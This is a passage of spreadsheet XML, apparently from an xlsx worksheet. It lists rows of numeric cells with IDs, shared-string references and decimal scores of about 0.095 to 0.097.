        <v>10480</v>
      </c>
      <c r="F13728" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13729" ht="15.75" customHeight="1">
      <c r="A13729" s="1">
        <v>31206.0</v>
      </c>
      <c r="B13729" s="2">
        <v>4.9228524E7</v>
      </c>
      <c r="C13729" s="2" t="s">
        <v>13213</v>
      </c>
      <c r="D13729" s="2">
        <v>1.0</v>
      </c>
      <c r="E13729" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13729" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13730" ht="15.75" customHeight="1">
      <c r="A13730" s="1">
        <v>31575.0</v>
      </c>
      <c r="B13730" s="2">
        <v>5124515.0</v>
      </c>
      <c r="C13730" s="2" t="s">
        <v>13214</v>
      </c>
      <c r="D13730" s="2">
        <v>1.0</v>
      </c>
      <c r="E13730" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13730" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13731" ht="15.75" customHeight="1">
      <c r="A13731" s="1">
        <v>31695.0</v>
      </c>
      <c r="B13731" s="2">
        <v>5.194108E7</v>
      </c>
      <c r="C13731" s="2" t="s">
        <v>13183</v>
      </c>
      <c r="D13731" s="2">
        <v>1.0</v>
      </c>
      <c r="E13731" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13731" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13732" ht="15.75" customHeight="1">
      <c r="A13732" s="1">
        <v>32108.0</v>
      </c>
      <c r="B13732" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C13732" s="2" t="s">
        <v>13215</v>
      </c>
      <c r="D13732" s="2">
        <v>1.0</v>
      </c>
      <c r="E13732" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13732" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13733" ht="15.75" customHeight="1">
      <c r="A13733" s="1">
        <v>32406.0</v>
      </c>
      <c r="B13733" s="2">
        <v>5.6327242E7</v>
      </c>
      <c r="C13733" s="2" t="s">
        <v>13216</v>
      </c>
      <c r="D13733" s="2">
        <v>1.0</v>
      </c>
      <c r="E13733" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13733" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13734" ht="15.75" customHeight="1">
      <c r="A13734" s="1">
        <v>32809.0</v>
      </c>
      <c r="B13734" s="2">
        <v>6184377.0</v>
      </c>
      <c r="C13734" s="2" t="s">
        <v>13217</v>
      </c>
      <c r="D13734" s="2">
        <v>1.0</v>
      </c>
      <c r="E13734" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13734" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13735" ht="15.75" customHeight="1">
      <c r="A13735" s="1">
        <v>33709.0</v>
      </c>
      <c r="B13735" s="2">
        <v>8491301.0</v>
      </c>
      <c r="C13735" s="2" t="s">
        <v>13218</v>
      </c>
      <c r="D13735" s="2">
        <v>1.0</v>
      </c>
      <c r="E13735" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13735" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13736" ht="15.75" customHeight="1">
      <c r="A13736" s="1">
        <v>34206.0</v>
      </c>
      <c r="B13736" s="2">
        <v>2.1713747E7</v>
      </c>
      <c r="C13736" s="2" t="s">
        <v>13219</v>
      </c>
      <c r="D13736" s="2">
        <v>1.0</v>
      </c>
      <c r="E13736" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13736" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13737" ht="15.75" customHeight="1">
      <c r="A13737" s="1">
        <v>4722.0</v>
      </c>
      <c r="B13737" s="2">
        <v>4.3316426E7</v>
      </c>
      <c r="C13737" s="2" t="s">
        <v>13220</v>
      </c>
      <c r="D13737" s="2">
        <v>1.0</v>
      </c>
      <c r="E13737" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13737" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="13738" ht="15.75" customHeight="1">
      <c r="A13738" s="1">
        <v>22369.0</v>
      </c>
      <c r="B13738" s="2">
        <v>3.4977171E7</v>
      </c>
      <c r="C13738" s="2" t="s">
        <v>13221</v>
      </c>
      <c r="D13738" s="2">
        <v>1.0</v>
      </c>
      <c r="E13738" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13738" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="13739" ht="15.75" customHeight="1">
      <c r="A13739" s="1">
        <v>24354.0</v>
      </c>
      <c r="B13739" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C13739" s="2" t="s">
        <v>13222</v>
      </c>
      <c r="D13739" s="2">
        <v>1.0</v>
      </c>
      <c r="E13739" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13739" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="13740" ht="15.75" customHeight="1">
      <c r="A13740" s="1">
        <v>3914.0</v>
      </c>
      <c r="B13740" s="2">
        <v>4.0534208E7</v>
      </c>
      <c r="C13740" s="2" t="s">
        <v>13223</v>
      </c>
      <c r="D13740" s="2">
        <v>1.0</v>
      </c>
      <c r="E13740" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13740" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="13741" ht="15.75" customHeight="1">
      <c r="A13741" s="1">
        <v>16839.0</v>
      </c>
      <c r="B13741" s="2">
        <v>4.7900919E7</v>
      </c>
      <c r="C13741" s="2" t="s">
        <v>13224</v>
      </c>
      <c r="D13741" s="2">
        <v>1.0</v>
      </c>
      <c r="E13741" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13741" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="13742" ht="15.75" customHeight="1">
      <c r="A13742" s="1">
        <v>19253.0</v>
      </c>
      <c r="B13742" s="2">
        <v>5.511386E7</v>
      </c>
      <c r="C13742" s="2" t="s">
        <v>13225</v>
      </c>
      <c r="D13742" s="2">
        <v>1.0</v>
      </c>
      <c r="E13742" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13742" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="13743" ht="15.75" customHeight="1">
      <c r="A13743" s="1">
        <v>13627.0</v>
      </c>
      <c r="B13743" s="2">
        <v>3.5886011E7</v>
      </c>
      <c r="C13743" s="2" t="s">
        <v>13226</v>
      </c>
      <c r="D13743" s="2">
        <v>1.0</v>
      </c>
      <c r="E13743" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13743" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="13744" ht="15.75" customHeight="1">
      <c r="A13744" s="1">
        <v>16922.0</v>
      </c>
      <c r="B13744" s="2">
        <v>4.8137942E7</v>
      </c>
      <c r="C13744" s="2" t="s">
        <v>13227</v>
      </c>
      <c r="D13744" s="2">
        <v>1.0</v>
      </c>
      <c r="E13744" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13744" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="13745" ht="15.75" customHeight="1">
      <c r="A13745" s="1">
        <v>14878.0</v>
      </c>
      <c r="B13745" s="2">
        <v>4.1080493E7</v>
      </c>
      <c r="C13745" s="2" t="s">
        <v>13228</v>
      </c>
      <c r="D13745" s="2">
        <v>1.0</v>
      </c>
      <c r="E13745" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13745" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="13746" ht="15.75" customHeight="1">
      <c r="A13746" s="1">
        <v>10051.0</v>
      </c>
      <c r="B13746" s="2">
        <v>5.7106683E7</v>
      </c>
      <c r="C13746" s="2" t="s">
        <v>13229</v>
      </c>
      <c r="D13746" s="2">
        <v>1.0</v>
      </c>
      <c r="E13746" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13746" s="2">
        <v>0.09611992945326278</v>
      </c>
    </row>
    <row r="13747" ht="15.75" customHeight="1">
      <c r="A13747" s="1">
        <v>3169.0</v>
      </c>
      <c r="B13747" s="2">
        <v>3.7031013E7</v>
      </c>
      <c r="C13747" s="2" t="s">
        <v>13230</v>
      </c>
      <c r="D13747" s="2">
        <v>1.0</v>
      </c>
      <c r="E13747" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13747" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="13748" ht="15.75" customHeight="1">
      <c r="A13748" s="1">
        <v>14674.0</v>
      </c>
      <c r="B13748" s="2">
        <v>4.045512E7</v>
      </c>
      <c r="C13748" s="2" t="s">
        <v>13231</v>
      </c>
      <c r="D13748" s="2">
        <v>1.0</v>
      </c>
      <c r="E13748" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13748" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="13749" ht="15.75" customHeight="1">
      <c r="A13749" s="1">
        <v>17011.0</v>
      </c>
      <c r="B13749" s="2">
        <v>4.8432459E7</v>
      </c>
      <c r="C13749" s="2" t="s">
        <v>13232</v>
      </c>
      <c r="D13749" s="2">
        <v>1.0</v>
      </c>
      <c r="E13749" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13749" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="13750" ht="15.75" customHeight="1">
      <c r="A13750" s="1">
        <v>8854.0</v>
      </c>
      <c r="B13750" s="2">
        <v>5.4728193E7</v>
      </c>
      <c r="C13750" s="2" t="s">
        <v>13233</v>
      </c>
      <c r="D13750" s="2">
        <v>1.0</v>
      </c>
      <c r="E13750" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13750" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="13751" ht="15.75" customHeight="1">
      <c r="A13751" s="1">
        <v>9154.0</v>
      </c>
      <c r="B13751" s="2">
        <v>5.5279455E7</v>
      </c>
      <c r="C13751" s="2" t="s">
        <v>13234</v>
      </c>
      <c r="D13751" s="2">
        <v>1.0</v>
      </c>
      <c r="E13751" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13751" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="13752" ht="15.75" customHeight="1">
      <c r="A13752" s="1">
        <v>10221.0</v>
      </c>
      <c r="B13752" s="2">
        <v>5.7459299E7</v>
      </c>
      <c r="C13752" s="2" t="s">
        <v>13235</v>
      </c>
      <c r="D13752" s="2">
        <v>1.0</v>
      </c>
      <c r="E13752" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13752" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="13753" ht="15.75" customHeight="1">
      <c r="A13753" s="1">
        <v>24164.0</v>
      </c>
      <c r="B13753" s="2">
        <v>1.0155821E7</v>
      </c>
      <c r="C13753" s="2" t="s">
        <v>13236</v>
      </c>
      <c r="D13753" s="2">
        <v>1.0</v>
      </c>
      <c r="E13753" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13753" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="13754" ht="15.75" customHeight="1">
      <c r="A13754" s="1">
        <v>24293.0</v>
      </c>
      <c r="B13754" s="2">
        <v>1.0557879E7</v>
      </c>
      <c r="C13754" s="2" t="s">
        <v>13237</v>
      </c>
      <c r="D13754" s="2">
        <v>1.0</v>
      </c>
      <c r="E13754" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13754" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="13755" ht="15.75" customHeight="1">
      <c r="A13755" s="1">
        <v>30110.0</v>
      </c>
      <c r="B13755" s="2">
        <v>3672890.0</v>
      </c>
      <c r="C13755" s="2" t="s">
        <v>13238</v>
      </c>
      <c r="D13755" s="2">
        <v>1.0</v>
      </c>
      <c r="E13755" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13755" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="13756" ht="15.75" customHeight="1">
      <c r="A13756" s="1">
        <v>722.0</v>
      </c>
      <c r="B13756" s="2">
        <v>2.0688711E7</v>
      </c>
      <c r="C13756" s="2" t="s">
        <v>13239</v>
      </c>
      <c r="D13756" s="2">
        <v>1.0</v>
      </c>
      <c r="E13756" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13756" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13757" ht="15.75" customHeight="1">
      <c r="A13757" s="1">
        <v>1168.0</v>
      </c>
      <c r="B13757" s="2">
        <v>2.4581659E7</v>
      </c>
      <c r="C13757" s="2" t="s">
        <v>13240</v>
      </c>
      <c r="D13757" s="2">
        <v>1.0</v>
      </c>
      <c r="E13757" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13757" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13758" ht="15.75" customHeight="1">
      <c r="A13758" s="1">
        <v>1585.0</v>
      </c>
      <c r="B13758" s="2">
        <v>2.7733094E7</v>
      </c>
      <c r="C13758" s="2" t="s">
        <v>13241</v>
      </c>
      <c r="D13758" s="2">
        <v>1.0</v>
      </c>
      <c r="E13758" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13758" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13759" ht="15.75" customHeight="1">
      <c r="A13759" s="1">
        <v>1891.0</v>
      </c>
      <c r="B13759" s="2">
        <v>2.9838533E7</v>
      </c>
      <c r="C13759" s="2" t="s">
        <v>13242</v>
      </c>
      <c r="D13759" s="2">
        <v>1.0</v>
      </c>
      <c r="E13759" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13759" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13760" ht="15.75" customHeight="1">
      <c r="A13760" s="1">
        <v>2064.0</v>
      </c>
      <c r="B13760" s="2">
        <v>3.1064241E7</v>
      </c>
      <c r="C13760" s="2" t="s">
        <v>13243</v>
      </c>
      <c r="D13760" s="2">
        <v>1.0</v>
      </c>
      <c r="E13760" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13760" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13761" ht="15.75" customHeight="1">
      <c r="A13761" s="1">
        <v>2404.0</v>
      </c>
      <c r="B13761" s="2">
        <v>3.3440615E7</v>
      </c>
      <c r="C13761" s="2" t="s">
        <v>13244</v>
      </c>
      <c r="D13761" s="2">
        <v>1.0</v>
      </c>
      <c r="E13761" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13761" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13762" ht="15.75" customHeight="1">
      <c r="A13762" s="1">
        <v>2862.0</v>
      </c>
      <c r="B13762" s="2">
        <v>3.5543815E7</v>
      </c>
      <c r="C13762" s="2" t="s">
        <v>13245</v>
      </c>
      <c r="D13762" s="2">
        <v>1.0</v>
      </c>
      <c r="E13762" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13762" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13763" ht="15.75" customHeight="1">
      <c r="A13763" s="1">
        <v>2945.0</v>
      </c>
      <c r="B13763" s="2">
        <v>3.5988328E7</v>
      </c>
      <c r="C13763" s="2" t="s">
        <v>13246</v>
      </c>
      <c r="D13763" s="2">
        <v>1.0</v>
      </c>
      <c r="E13763" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13763" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13764" ht="15.75" customHeight="1">
      <c r="A13764" s="1">
        <v>3031.0</v>
      </c>
      <c r="B13764" s="2">
        <v>3.645209E7</v>
      </c>
      <c r="C13764" s="2" t="s">
        <v>13247</v>
      </c>
      <c r="D13764" s="2">
        <v>1.0</v>
      </c>
      <c r="E13764" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13764" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13765" ht="15.75" customHeight="1">
      <c r="A13765" s="1">
        <v>3373.0</v>
      </c>
      <c r="B13765" s="2">
        <v>3.7916921E7</v>
      </c>
      <c r="C13765" s="2" t="s">
        <v>13248</v>
      </c>
      <c r="D13765" s="2">
        <v>1.0</v>
      </c>
      <c r="E13765" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13765" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13766" ht="15.75" customHeight="1">
      <c r="A13766" s="1">
        <v>3711.0</v>
      </c>
      <c r="B13766" s="2">
        <v>3.9601742E7</v>
      </c>
      <c r="C13766" s="2" t="s">
        <v>13249</v>
      </c>
      <c r="D13766" s="2">
        <v>1.0</v>
      </c>
      <c r="E13766" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13766" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13767" ht="15.75" customHeight="1">
      <c r="A13767" s="1">
        <v>3731.0</v>
      </c>
      <c r="B13767" s="2">
        <v>3.9633621E7</v>
      </c>
      <c r="C13767" s="2" t="s">
        <v>13250</v>
      </c>
      <c r="D13767" s="2">
        <v>1.0</v>
      </c>
      <c r="E13767" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13767" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13768" ht="15.75" customHeight="1">
      <c r="A13768" s="1">
        <v>4004.0</v>
      </c>
      <c r="B13768" s="2">
        <v>4.090148E7</v>
      </c>
      <c r="C13768" s="2" t="s">
        <v>13251</v>
      </c>
      <c r="D13768" s="2">
        <v>1.0</v>
      </c>
      <c r="E13768" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13768" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13769" ht="15.75" customHeight="1">
      <c r="A13769" s="1">
        <v>4363.0</v>
      </c>
      <c r="B13769" s="2">
        <v>4.2120283E7</v>
      </c>
      <c r="C13769" s="2" t="s">
        <v>13252</v>
      </c>
      <c r="D13769" s="2">
        <v>1.0</v>
      </c>
      <c r="E13769" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13769" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13770" ht="15.75" customHeight="1">
      <c r="A13770" s="1">
        <v>5683.0</v>
      </c>
      <c r="B13770" s="2">
        <v>4.6413181E7</v>
      </c>
      <c r="C13770" s="2" t="s">
        <v>13253</v>
      </c>
      <c r="D13770" s="2">
        <v>1.0</v>
      </c>
      <c r="E13770" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13770" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13771" ht="15.75" customHeight="1">
      <c r="A13771" s="1">
        <v>6146.0</v>
      </c>
      <c r="B13771" s="2">
        <v>4.7835781E7</v>
      </c>
      <c r="C13771" s="2" t="s">
        <v>13254</v>
      </c>
      <c r="D13771" s="2">
        <v>1.0</v>
      </c>
      <c r="E13771" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13771" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13772" ht="15.75" customHeight="1">
      <c r="A13772" s="1">
        <v>6163.0</v>
      </c>
      <c r="B13772" s="2">
        <v>4.7872694E7</v>
      </c>
      <c r="C13772" s="2" t="s">
        <v>13255</v>
      </c>
      <c r="D13772" s="2">
        <v>1.0</v>
      </c>
      <c r="E13772" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13772" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13773" ht="15.75" customHeight="1">
      <c r="A13773" s="1">
        <v>6685.0</v>
      </c>
      <c r="B13773" s="2">
        <v>4.9179039E7</v>
      </c>
      <c r="C13773" s="2" t="s">
        <v>13256</v>
      </c>
      <c r="D13773" s="2">
        <v>1.0</v>
      </c>
      <c r="E13773" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13773" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13774" ht="15.75" customHeight="1">
      <c r="A13774" s="1">
        <v>7103.0</v>
      </c>
      <c r="B13774" s="2">
        <v>5.0350519E7</v>
      </c>
      <c r="C13774" s="2" t="s">
        <v>13257</v>
      </c>
      <c r="D13774" s="2">
        <v>1.0</v>
      </c>
      <c r="E13774" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13774" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13775" ht="15.75" customHeight="1">
      <c r="A13775" s="1">
        <v>9149.0</v>
      </c>
      <c r="B13775" s="2">
        <v>5.5267689E7</v>
      </c>
      <c r="C13775" s="2" t="s">
        <v>13258</v>
      </c>
      <c r="D13775" s="2">
        <v>1.0</v>
      </c>
      <c r="E13775" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13775" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13776" ht="15.75" customHeight="1">
      <c r="A13776" s="1">
        <v>10241.0</v>
      </c>
      <c r="B13776" s="2">
        <v>5.7529545E7</v>
      </c>
      <c r="C13776" s="2" t="s">
        <v>13259</v>
      </c>
      <c r="D13776" s="2">
        <v>1.0</v>
      </c>
      <c r="E13776" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13776" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13777" ht="15.75" customHeight="1">
      <c r="A13777" s="1">
        <v>10420.0</v>
      </c>
      <c r="B13777" s="2">
        <v>1.0231395E7</v>
      </c>
      <c r="C13777" s="2" t="s">
        <v>13260</v>
      </c>
      <c r="D13777" s="2">
        <v>1.0</v>
      </c>
      <c r="E13777" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13777" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13778" ht="15.75" customHeight="1">
      <c r="A13778" s="1">
        <v>10635.0</v>
      </c>
      <c r="B13778" s="2">
        <v>1.404387E7</v>
      </c>
      <c r="C13778" s="2" t="s">
        <v>13261</v>
      </c>
      <c r="D13778" s="2">
        <v>1.0</v>
      </c>
      <c r="E13778" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13778" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13779" ht="15.75" customHeight="1">
      <c r="A13779" s="1">
        <v>10642.0</v>
      </c>
      <c r="B13779" s="2">
        <v>1.4119532E7</v>
      </c>
      <c r="C13779" s="2" t="s">
        <v>13262</v>
      </c>
      <c r="D13779" s="2">
        <v>1.0</v>
      </c>
      <c r="E13779" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13779" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13780" ht="15.75" customHeight="1">
      <c r="A13780" s="1">
        <v>10793.0</v>
      </c>
      <c r="B13780" s="2">
        <v>1.571245E7</v>
      </c>
      <c r="C13780" s="2" t="s">
        <v>13263</v>
      </c>
      <c r="D13780" s="2">
        <v>1.0</v>
      </c>
      <c r="E13780" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13780" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13781" ht="15.75" customHeight="1">
      <c r="A13781" s="1">
        <v>11465.0</v>
      </c>
      <c r="B13781" s="2">
        <v>2.1946343E7</v>
      </c>
      <c r="C13781" s="2" t="s">
        <v>13264</v>
      </c>
      <c r="D13781" s="2">
        <v>1.0</v>
      </c>
      <c r="E13781" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13781" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13782" ht="15.75" customHeight="1">
      <c r="A13782" s="1">
        <v>12161.0</v>
      </c>
      <c r="B13782" s="2">
        <v>2.7322282E7</v>
      </c>
      <c r="C13782" s="2" t="s">
        <v>13265</v>
      </c>
      <c r="D13782" s="2">
        <v>1.0</v>
      </c>
      <c r="E13782" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13782" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13783" ht="15.75" customHeight="1">
      <c r="A13783" s="1">
        <v>12306.0</v>
      </c>
      <c r="B13783" s="2">
        <v>2.8377496E7</v>
      </c>
      <c r="C13783" s="2" t="s">
        <v>13266</v>
      </c>
      <c r="D13783" s="2">
        <v>1.0</v>
      </c>
      <c r="E13783" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13783" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13784" ht="15.75" customHeight="1">
      <c r="A13784" s="1">
        <v>13644.0</v>
      </c>
      <c r="B13784" s="2">
        <v>3.5912905E7</v>
      </c>
      <c r="C13784" s="2" t="s">
        <v>13267</v>
      </c>
      <c r="D13784" s="2">
        <v>1.0</v>
      </c>
      <c r="E13784" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13784" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13785" ht="15.75" customHeight="1">
      <c r="A13785" s="1">
        <v>14008.0</v>
      </c>
      <c r="B13785" s="2">
        <v>3.7405116E7</v>
      </c>
      <c r="C13785" s="2" t="s">
        <v>13268</v>
      </c>
      <c r="D13785" s="2">
        <v>1.0</v>
      </c>
      <c r="E13785" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13785" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13786" ht="15.75" customHeight="1">
      <c r="A13786" s="1">
        <v>14798.0</v>
      </c>
      <c r="B13786" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C13786" s="2" t="s">
        <v>13269</v>
      </c>
      <c r="D13786" s="2">
        <v>1.0</v>
      </c>
      <c r="E13786" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13786" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13787" ht="15.75" customHeight="1">
      <c r="A13787" s="1">
        <v>15033.0</v>
      </c>
      <c r="B13787" s="2">
        <v>4.1560329E7</v>
      </c>
      <c r="C13787" s="2" t="s">
        <v>13270</v>
      </c>
      <c r="D13787" s="2">
        <v>1.0</v>
      </c>
      <c r="E13787" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13787" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13788" ht="15.75" customHeight="1">
      <c r="A13788" s="1">
        <v>16348.0</v>
      </c>
      <c r="B13788" s="2">
        <v>4.6087516E7</v>
      </c>
      <c r="C13788" s="2" t="s">
        <v>13271</v>
      </c>
      <c r="D13788" s="2">
        <v>1.0</v>
      </c>
      <c r="E13788" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13788" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13789" ht="15.75" customHeight="1">
      <c r="A13789" s="1">
        <v>17000.0</v>
      </c>
      <c r="B13789" s="2">
        <v>4.8395748E7</v>
      </c>
      <c r="C13789" s="2" t="s">
        <v>13272</v>
      </c>
      <c r="D13789" s="2">
        <v>1.0</v>
      </c>
      <c r="E13789" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13789" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13790" ht="15.75" customHeight="1">
      <c r="A13790" s="1">
        <v>17437.0</v>
      </c>
      <c r="B13790" s="2">
        <v>4.9737928E7</v>
      </c>
      <c r="C13790" s="2" t="s">
        <v>13273</v>
      </c>
      <c r="D13790" s="2">
        <v>1.0</v>
      </c>
      <c r="E13790" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13790" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13791" ht="15.75" customHeight="1">
      <c r="A13791" s="1">
        <v>17557.0</v>
      </c>
      <c r="B13791" s="2">
        <v>5.0208837E7</v>
      </c>
      <c r="C13791" s="2" t="s">
        <v>13274</v>
      </c>
      <c r="D13791" s="2">
        <v>1.0</v>
      </c>
      <c r="E13791" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13791" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13792" ht="15.75" customHeight="1">
      <c r="A13792" s="1">
        <v>18016.0</v>
      </c>
      <c r="B13792" s="2">
        <v>5.149917E7</v>
      </c>
      <c r="C13792" s="2" t="s">
        <v>13275</v>
      </c>
      <c r="D13792" s="2">
        <v>1.0</v>
      </c>
      <c r="E13792" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13792" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13793" ht="15.75" customHeight="1">
      <c r="A13793" s="1">
        <v>18291.0</v>
      </c>
      <c r="B13793" s="2">
        <v>5.2303128E7</v>
      </c>
      <c r="C13793" s="2" t="s">
        <v>13276</v>
      </c>
      <c r="D13793" s="2">
        <v>1.0</v>
      </c>
      <c r="E13793" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13793" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13794" ht="15.75" customHeight="1">
      <c r="A13794" s="1">
        <v>18578.0</v>
      </c>
      <c r="B13794" s="2">
        <v>5.3243216E7</v>
      </c>
      <c r="C13794" s="2" t="s">
        <v>13277</v>
      </c>
      <c r="D13794" s="2">
        <v>1.0</v>
      </c>
      <c r="E13794" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13794" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13795" ht="15.75" customHeight="1">
      <c r="A13795" s="1">
        <v>18639.0</v>
      </c>
      <c r="B13795" s="2">
        <v>5.3409432E7</v>
      </c>
      <c r="C13795" s="2" t="s">
        <v>13278</v>
      </c>
      <c r="D13795" s="2">
        <v>1.0</v>
      </c>
      <c r="E13795" s="3" t="s">
